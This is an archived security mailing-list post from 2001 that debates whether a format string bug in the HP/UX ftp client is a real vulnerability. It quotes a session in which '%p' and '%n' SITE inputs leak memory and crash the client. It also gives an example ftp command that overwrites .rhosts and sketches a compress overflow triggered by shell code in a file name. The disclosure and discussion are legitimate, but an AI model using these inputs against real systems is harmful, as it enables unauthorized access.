mailing list archives
Re: HP/UX FTP format string vulnerability
From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Mon, 8 Jan 2001 20:48:56 -0600
Maybe I am missing the point, but how is making a non-setuid client
application crash a vulnerability? Most Linux distro's before the summer of
2000 had the same problem, yet it never became a security issue. I could
understand if the app was being called by a privileged application under
control of a non-privileged user, but this doesnt seem to be the case.
During the normal use of the ftp program, there is no reason for the user to
ever execute the SITE command containing the exact format string sequence
needed to exploit this. Since the bug only affects the SITE command, even
people doing batch-mode transfers from untrusted sites shouldn't worry. The
only exploit situation is if you allow an untrusted user to add commands to
your .netrc or otherwise have your user account execute arbitrary ftp
commands, either of which provides much easier access to your account than
exploiting a format string (get /some/dir/evilhosts /home/user/.rhosts).
This is almost as bad as saying that you can read /etc/shadow if you know
root's password, then calling it a vulnerability. Anyways, attached is the
1. I made a post a while back referring to overflows in the compress program,
but that program is installed on most anonymous FTP sites, allowing remote
users to gain shell access by uploading a file whose name contains the shell
code, then requesting the name of that file plus ".Z". Since then, SuSE has
fixed their version, not sure about anyone else. The compress program is part
of the "ncompress" package of most linux installations.
On Monday 08 January 2001 03:55 pm, [ zorgon ] wrote:
HP/UX FTP format string vulnerability
A format string vulnerability exists in ftp. This vulnerability was
discussed with HP labs.
$ uname -a
HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
$ ftp localhost
Connected to localhost.
220 localhost FTP server (Version 220.127.116.11 Wed Feb 9 08:03:34 GMT 2000)
ready. Name (localhost:zorgon):zorgon
331 Password required for zorgon.
230 User zorgon logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site exec %p %p %p %p
200-40008f10 00000003 00000002 00000001
200 (end of '40008f10 00000003 00000002 00000001')
ftp> site exec %n %n %n %n
And the 'SITE' command is also vulnerable
ftp> site %p %p %p %p
500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.
ftp> site %n %n %n %n
$ file core
core: fichier de vidage de la memoire de'ftp' - recu SIGBUS
The character format strings are not being parsed correctly in the ftp
client. When HP labs fix the problem in the client, the result will be :
ftp> site exec %n %n %n %n
---> SITE exec %n %n %n %n
200-%n %n %n %n
200 (end of '%n %n %n %n')
So in this case the ftpd server will not process the character format
strings. The fix will be made in the next release of the ftp client.